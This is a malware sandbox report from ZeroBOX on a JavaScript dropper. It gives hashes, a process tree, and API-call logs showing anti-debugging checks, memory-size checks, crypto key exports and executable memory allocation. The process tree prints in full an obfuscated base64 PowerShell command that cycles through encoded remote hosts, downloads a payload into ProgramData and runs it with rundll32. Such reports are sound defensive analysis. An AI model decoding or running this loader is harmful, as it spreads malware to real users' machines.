Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6403_us	May 25, 2023, 10:43 a.m.	May 25, 2023, 10:45 a.m.

Size	294.9KB
Type	ASCII text, with very long lines, with CRLF line terminators
MD5	`6fb012a2b6d44621cd97ec623362180f`
SHA256	`5dadd73ea5008e64b8163f83bb5e6cfb4f5183316e606ba259378b50cd190455`
CRC32	`245FE0E3`
ssdeep	`3072:IPCyQh6s01IUgNnbFEPWkzqn4qjOJWjvmXO/9yfN8PJxmsfWY03K/BxDeeaj:9yNs01IRZRk2/OJWZ1y80UI3K/BRDaj`
Yara	None matched

wscript.exe "C:\Windows\System32\wscript.exe" C:\Users\test22\AppData\Local\Temp\exocoetidae.js
1664
- wscript.exe "C:\Windows\System32\wscript.exe" "C:\ProgramData\angiolithApodyterium.js" NodulationSophia coshersButlerage swearer tarsal
  2616
  - powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedcommand "JABsAGEAbgBvAGwAaQBuAGUAcwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEcAOABBAGQAZwBCAGwAQQBIAEkAQQBkAEEAQgBvAEEASABJAEEAWgBRAEIAMwBBAEUAdwBBAFkAUQBCAGsAQQBHAGsAQQBaAGcAQgA1AEEAQwA0AEEAWgBRAEIAaABBAEgASQBBAGQAQQBCAG8AQQBBAD0APQBEAFQAcABhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBHAE0AQQBZAFEAQgA1AEEASABVAEEAYwB3AEIAbABBAEgATQBBAFQAQQBCAGgAQQBHAEkAQQBiAHcAQgB5AEEARwBFAEEAYgBnAEIAMABBAEMANABBAGQAQQBCAHAAQQBIAEkAQQBiAHcAQgBzAEEAQQA9AD0ARABUAHAAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABjAEEATQBnAEEAdQBBAEQAWQBBAE8AUQBBAHUAQQBEAFEAQQBOAHcAQQB1AEEARABjAEEATwBBAEEAPQBEAFQAcABhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAGcAQQBOAGcAQQB1AEEARABFAEEATQB3AEEAeQBBAEMANABBAE0AUQBBADEAQQBEAGsAQQBMAGcAQQB5AEEARABBAEEATQBnAEEAPQAiADsAJABjAHIAdQBzAHQAYQBjAGUAbwBsAG8AZwBpAHMAdAAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQAVQBBAE4AZwBBAHUAQQBEAEUAQQBOAEEAQQAzAEEAQwA0AEEATQBRAEEAeQBBAEQAWQBBAEwAZwBBAHgAQQBEAFkAQQBOAFEAQQA9AE4AQQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAEkAQQBOAEEAQQB1AEEARABFAEEATgBBAEEAeQBBAEMANABBAE0AUQBBADMAQQBEAEUAQQBMAGcAQQB4AEEARABjAEEATwBRAEEAPQBOAEEAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARgBFAEEAZABRAEIAcABBAEcAVQBBAGMAdwBCAGoAQQBHAFUAQQBiAGcAQgBqAEEARwBVAEEAVQBBAEIAeQBBAEcAVQBBAGMAdwBCADAAQQBHAGsAQQBaAHcAQgBwAEEARwBFAEEAZABBAEIAcABBAEcAOABBAGIAZwBBAHUAQQBHAHcAQQBiAHcAQgBoAEEARwA0AEEATgBBAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQASQBBAE0AdwBBAHkAQQBDADQAQQBOAEEAQQB3AEEAQwA0AEEATQBRAEEAMgBBAEQAUQBBAEwAZwBBAHgAQQBEAEEAQQBNAHcAQQA9ACIAOwAkAHMAdABvAHIAYQB4ACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQAwAEEARABZAEEATABnAEEAMQBBAEQAVQBBAEwAZwBBADAAQQBEAEkAQQBMAGcAQQAxAEEARABRAEEAegBVAD0AYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABZAEEATgBRAEEAdQBBAEQAawBBAE4AUQBBAHUAQQBEAEkAQQBNAFEAQQAyAEEAQwA0AEEATQBnAEEAdwBBAEQAWQBBAHoAVQA9AGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEcATQBBAGEAUQBCADIAQQBHAFUAQQBkAEEAQgB2AEEARwA0AEEAWgBRAEIAUwBBAEcARQBBAGIAUQBCAHoAQQBIAFEAQQBaAFEAQgBoAEEARwBRAEEATABnAEIAcwBBAEgAUQBBAFoAQQBCAGgAQQBBAD0APQB6AFUAPQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAGwAQQBHADQAQQBkAEEAQgB5AEEARwBFAEEAYQBRAEIAdQBBAEMANABBAGEAUQBCAHoAQQBBAD0APQAiADsAJABPAHUAdABzAGkAZwBoAEgAYQBkAGgAcgBhAG0AYQB1AHQAaQBhAG4AIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBADIAQQBEAEEAQQBMAGcAQQA0AEEARABnAEEATABnAEEAeABBAEQAUQBBAE4AdwBBAHUAQQBEAEkAQQBOAEEAQQB6AEEAQwA4AEEAVwBRAEIAcQBBAEYASQBBAEwAdwBCAEgAQQBFADgAQQBkAGcAQgA0AEEARQBVAEEAcQBzAHQAZgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAEUAQQBNAEEAQQB1AEEARABFAEEATQB3AEEANABBAEMANABBAE8AQQBBADIAQQBDADQAQQBNAFEAQQAxAEEARABnAEEATAB3AEIAcABBAEcARQBBAEwAdwBCAEsAQQBBAD0APQBxAHMAdABmAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQARQBBAE8AQQBBAHUAQQBEAFUAQQBOAHcAQQB1AEEARABFAEEATgBRAEEAdwBBAEMANABBAE0AUQBBAHkAQQBEAEUAQQBMAHcAQgBNAEEASABBAEEATQBRAEIAcQBBAEgAWQBBAEwAdwBCAFQAQQBBAD0APQBxAHMAdABmAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAawBBAE0AZwBBAHUAQQBEAEUAQQBNAGcAQQB4AEEAQwA0AEEATQBnAEEAegBBAEMANABBAE0AUQBBAHcAQQBEAFEAQQBMAHcAQgBVAEEARQB3AEEAUgB3AEIAbwBBAEUANABBAFoAQQBBAHYAQQBHADAAQQBNAEEAQgBHAEEARwBjAEEAUgB3AEEAMwBBAEcAcwBBAGIAZwBBAD0AcQBzAHQAZgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAGsAQQBNAGcAQQB1AEEARABFAEEATQBnAEEAeABBAEMANABBAE0AZwBBAHoAQQBDADQAQQBOAGcAQQB4AEEAQwA4AEEATwBRAEIAaABBAEQAWQBBAE4AdwBCAHcAQQBHAFUAQQBjAHcAQQB2AEEARQB3AEEAVwBBAEIAdABBAEQASQBBAE4AUQBCAFQAQQBHAEUAQQBTAEEAQgBOAEEARgBvAEEATQB3AEEAPQBxAHMAdABmAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAUQBBAE8AUQBBAHUAQQBEAEUAQQBOAFEAQQAwAEEAQwA0AEEATQBRAEEAMQBBAEQAawBBAEwAZwBBADUAQQBEAGcAQQBMAHcAQgBRAEEASABBAEEAVgBRAEIAWgBBAEYAZwBBAEwAdwBCAHQAQQBIAEEAQQBhAEEAQgBJAEEARQBnAEEAYwBRAEIARwBBAEUAdwBBAFEAdwBCAHIAQQBGAGcAQQAiADsAZgBvAHIAZQBhAGMAaAAgACgAJAB0AGEAdABhAHUAcABhAEQAaQBnAGkAdABhAGwAaQBuACAAaQBuACAAJABPAHUAdABzAGkAZwBoAEgAYQBkAGgAcgBhAG0AYQB1AHQAaQBhAG4AIAAtAHMAcABsAGkAdAAgACIAcQBzAHQAZgAiACkAIAB7AHQAcgB5ACAAewAkAFMAYQBuAGcAdQBpAHMAdQBnAG8AdQBzACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABBAEEATgBnAEEAdQBBAEQARQBBAE8AUQBBADEAQQBDADQAQQBNAFEAQQAwAEEARABRAEEATABnAEEAMABBAEQAUQBBAE4AcgBkAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEYASQBBAFoAUQBCADMAQQBHADgAQQBjAGcAQgByAEEASABNAEEATABnAEIAbgBBAEcAawBBAFoAZwBCADAAQQBIAE0AQQBOAHIAZABhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBADMAQQBEAGcAQQBMAGcAQQB5AEEARABJAEEATQB3AEEAdQBBAEQARQBBAE0AQQBBADAAQQBDADQAQQBPAEEAQQAyAEEAQQA9AD0ATgByAGQAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABJAEEATgBBAEEAMwBBAEMANABBAE0AUQBBAHcAQQBEAEkAQQBMAGcAQQAxAEEARABJAEEATABnAEEANABBAEQATQBBACIAOwAkAHAAaABvAGwAaQBvAHQAYQBVAG4AYQBnAHIAZQBlAGkAbgBnACAAPQAgAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAbgBpAGMAbwBkAGUALgBHAGUAdABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAHQAYQB0AGEAdQBwAGEARABpAGcAaQB0AGEAbABpAG4AKQApADsASQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAAJABwAGgAbwBsAGkAbwB0AGEAVQBuAGEAZwByAGUAZQBpAG4AZwAgAC0ATwAgACQAZQBuAHYAOgBQAHIAbwBnAHIAYQBtAEQAYQB0AGEAXABnAHIAdQBuAHQAbABpAG4AZwBNAGUAdABoAGUAcgAuAGcAZQBvAG0AYQBuAHQAaQBjAFQAaAB5AHIAbwBpAGQAZQBhADsAJAB3AGgAbwBsAGUAcwBhAGwAZQBuAGUAcwBzAEkAbgB0AHUAYgBhAHQAbwByACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARgBBAEEAYwBnAEIAbABBAEgAUQBBAGMAZwBCAGgAQQBHADQAQQBjAHcAQgB0AEEARwBrAEEAZABBAEIAMABBAEcAawBBAGIAZwBCAG4AQQBDADQAQQBZAGcAQgBsAEEASABRAEEATQBBAHYAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB5AEEARABJAEEATwBBAEEAdQBBAEQAWQBBAE8AQQBBAHUAQQBEAFEAQQBNAFEAQQB1AEEARABZAEEATwBRAEEAPQBNAEEAdgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBHAEUAQQBZAHcAQgBqAEEARwBrAEEAWgBBAEIAbABBAEcANABBAGQAQQBCAHMAQQBIAGsAQQBMAGcAQgAzAEEARwBVAEEAWgBBAEIAawBBAEcAawBBAGIAZwBCAG4AQQBBAD0APQAiADsAJABVAG4AZABlAHIAYwByAHUAcwB0ACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABJAEEATgBBAEEANQBBAEMANABBAE0AZwBBAHcAQQBEAGcAQQBMAGcAQQAwAEEARABFAEEATABnAEEAeABBAEQARQBBAE4AUQBBAD0AIgA7AGkAZgAgACgAKABHAGUAdAAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAZwByAHUAbgB0AGwAaQBuAGcATQBlAHQAaABlAHIALgBnAGUAbwBtAGEAbgB0AGkAYwBUAGgAeQByAG8AaQBkAGUAYQApAC4ATABlAG4AZwB0AGgAIAAtAGcAZQAgADIAMwA2ADMAMAAwACkAewBwAG8AdwBlAHIAcwBoAGUAbABsACAALQBlAG4AYwBvAGQAZQBkAGMAbwBtAG0AYQBuAGQAIAAiAGMAdwBCADAAQQBHAEUAQQBjAGcAQgAwAEEAQwBBAEEAYwBnAEIAMQBBAEcANABBAFoAQQBCAHMAQQBHAHcAQQBNAHcAQQB5AEEAQwBBAEEASgBBAEIAbABBAEcANABBAGQAZwBBADYAQQBGAEEAQQBjAGcAQgB2AEEARwBjAEEAYwBnAEIAaABBAEcAMABBAFIAQQBCAGgAQQBIAFEAQQBZAFEAQgBjAEEARwBjAEEAYwBnAEIAMQBBAEcANABBAGQAQQBCAHMAQQBHAGsAQQBiAGcAQgBuAEEARQAwAEEAWgBRAEIAMABBAEcAZwBBAFoAUQBCAHkAQQBDADQAQQBaAHcAQgBsAEEARwA4AEEAYgBRAEIAaABBAEcANABBAGQAQQBCAHAAQQBHAE0AQQBWAEEAQgBvAEEASABrAEEAYwBnAEIAdgBBAEcAawBBAFoAQQBCAGwAQQBHAEUAQQBMAEEAQgBpAEEARwBrAEEAYgBnAEIAawBBAEQAcwBBACIAOwAkAEwAbwB0AG0AZQBuAHQATgBlAHAAaAByAG8AZABpAG4AaQBjACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBrAEEARwBVAEEAWQBnAEIAcwBBAEcAOABBAFkAdwBCAHIAQQBFAEUAQQBiAEEAQgBwAEEARwAwAEEAWgBRAEIAdQBBAEgAUQBBAFkAUQBCAHMAQQBDADQAQQBhAFEAQgB6AEEAQQA9AD0ASgBFAFQATgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBADEAQQBEAGcAQQBMAGcAQQB4AEEARABNAEEATQBBAEEAdQBBAEQARQBBAE4AZwBBAHgAQQBDADQAQQBNAFEAQQA0AEEARABNAEEASgBFAFQATgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHkAQQBEAE0AQQBPAFEAQQB1AEEARABFAEEATwBRAEEANABBAEMANABBAE0AUQBBADQAQQBEAGsAQQBMAGcAQQA1AEEARABBAEEAIgA7ACQATgBvAG4AcAB1AG4AYwB0AHUAYQB0AGkAbwBuACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQAwAEEARABVAEEATABnAEEAeABBAEQAawBBAE4AQQBBAHUAQQBEAFkAQQBOAGcAQQB1AEEARABnAEEATQBBAEEAPQAiADsAJABjAG8AdQBuAHQAZQByAHIAbwB1AG4AZAAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQARQBBAE8AUQBBAHoAQQBDADQAQQBNAFEAQQAxAEEARABjAEEATABnAEEAeABBAEQAZwBBAE4AdwBBAHUAQQBEAFkAQQBNAEEAQQA9AHMAaQBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEUAQQBOAGcAQQA0AEEAQwA0AEEATQBRAEEANABBAEQATQBBAEwAZwBBAHgAQQBEAEkAQQBNAGcAQQB1AEEARABFAEEATgBRAEEANQBBAEEAPQA9ACIAOwBiAHIAZQBhAGsAOwB9AH0AIABjAGEAdABjAGgAIAB7AFMAdABhAHIAdAAtAFMAbABlAGUAcAAgAC0AUwBlAGMAbwBuAGQAcwAgADMAOwB9AH0A"
    2736

Name	Response	Post-Analysis Lookup
No hosts contacted.

IP Address	Status	Action
No hosts contacted.

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Queries for the computername (6 events)

Time & API	Arguments	Status	Return
GetComputerNameW May 25, 2023, 10:43 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 25, 2023, 10:43 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 25, 2023, 10:43 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 25, 2023, 10:43 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA May 25, 2023, 10:43 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 25, 2023, 10:43 a.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (1 event)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent May 25, 2023, 10:43 a.m.			0	0

Uses Windows APIs to generate a cryptographic key (42 events)

Time & API	Arguments	Status	Return
CryptExportKey May 25, 2023, 10:43 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e3f68 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 25, 2023, 10:43 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e40a8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 25, 2023, 10:43 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e40a8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 25, 2023, 10:43 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e40a8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 25, 2023, 10:43 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e38a8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 25, 2023, 10:43 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e38a8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 25, 2023, 10:43 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e38a8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 25, 2023, 10:43 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e38a8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 25, 2023, 10:43 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e38a8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 25, 2023, 10:43 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e38a8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 25, 2023, 10:43 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e40a8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 25, 2023, 10:43 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e40a8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 25, 2023, 10:43 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e40a8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 25, 2023, 10:43 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e4628 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 25, 2023, 10:43 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e4628 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 25, 2023, 10:43 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e4628 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 25, 2023, 10:43 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e4328 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 25, 2023, 10:43 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e4628 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 25, 2023, 10:43 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e4628 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 25, 2023, 10:43 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e4628 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 25, 2023, 10:43 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e4628 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 25, 2023, 10:43 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e4628 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 25, 2023, 10:43 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e4628 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 25, 2023, 10:43 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e4628 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 25, 2023, 10:43 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e43e8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 25, 2023, 10:43 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e43e8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 25, 2023, 10:43 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e43e8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 25, 2023, 10:43 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e43e8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 25, 2023, 10:43 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e43e8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 25, 2023, 10:43 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e43e8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 25, 2023, 10:43 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e43e8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 25, 2023, 10:43 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e43e8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 25, 2023, 10:43 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e43e8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 25, 2023, 10:43 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e43e8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 25, 2023, 10:43 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e43e8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 25, 2023, 10:43 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e43e8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 25, 2023, 10:43 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e43e8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 25, 2023, 10:43 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e43e8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 25, 2023, 10:43 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e4468 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 25, 2023, 10:43 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e4468 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 25, 2023, 10:43 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e4468 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 25, 2023, 10:43 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e4468 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx May 25, 2023, 10:43 a.m.		1	1	0

Allocates read-write-execute memory (usually to unpack itself) (50 out of 134 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory May 25, 2023, 10:43 a.m.	process_identifier: 2736 region_size: 1179648 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02630000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 25, 2023, 10:43 a.m.	process_identifier: 2736 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02710000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory May 25, 2023, 10:43 a.m.	process_identifier: 2736 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72fd1000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 25, 2023, 10:43 a.m.	process_identifier: 2736 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0249a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory May 25, 2023, 10:43 a.m.	process_identifier: 2736 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72fd2000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 25, 2023, 10:43 a.m.	process_identifier: 2736 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02492000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 25, 2023, 10:43 a.m.	process_identifier: 2736 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024a2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 25, 2023, 10:43 a.m.	process_identifier: 2736 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02711000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 25, 2023, 10:43 a.m.	process_identifier: 2736 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02712000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 25, 2023, 10:43 a.m.	process_identifier: 2736 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024da000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 25, 2023, 10:43 a.m.	process_identifier: 2736 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024a3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 25, 2023, 10:43 a.m.	process_identifier: 2736 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024a4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 25, 2023, 10:43 a.m.	process_identifier: 2736 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0252b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 25, 2023, 10:43 a.m.	process_identifier: 2736 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02527000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 25, 2023, 10:43 a.m.	process_identifier: 2736 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0249b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
